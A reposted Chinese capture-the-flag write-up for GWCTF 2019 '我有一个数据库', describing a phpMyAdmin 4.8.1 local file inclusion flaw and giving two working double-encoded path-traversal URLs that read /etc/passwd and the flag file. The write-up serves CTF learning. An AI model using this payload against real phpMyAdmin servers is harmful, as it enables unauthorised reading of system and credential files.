[GWCTF 2019]我有一个数据库

Posted 夜幕下的灯火阑珊

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[GWCTF 2019]我有一个数据库相关的知识,希望对你有一定的参考价值。

知识点

  • phpmyadmin任意文件读取

 

dirb扫描到后台有phpmyadmin目录,访问一下


技术图片

 

版本为4.81,经查询,存在远程文件读取漏洞

直接上payload读取passwd文件

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

 


技术图片

 

读取成功,尝试读取flag文件

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag

 


技术图片

 

参考
phpMyAdmin 4.8.x 本地文件包含漏洞利用
phpmyadmin 4.8.1 远程文件包含漏洞

以上是关于[GWCTF 2019]我有一个数据库的主要内容,如果未能解决你的问题,请参考以下文章

[GWCTF 2019]我有一个数据库

[GWCTF 2019]我有一个数据库

[GWCTF 2019]我有一个数据库

BUUCTF [GWCTF 2019]pyre WriteUp

GWCTF-2019 mypassword

[GWCTF 2019]枯燥的抽奖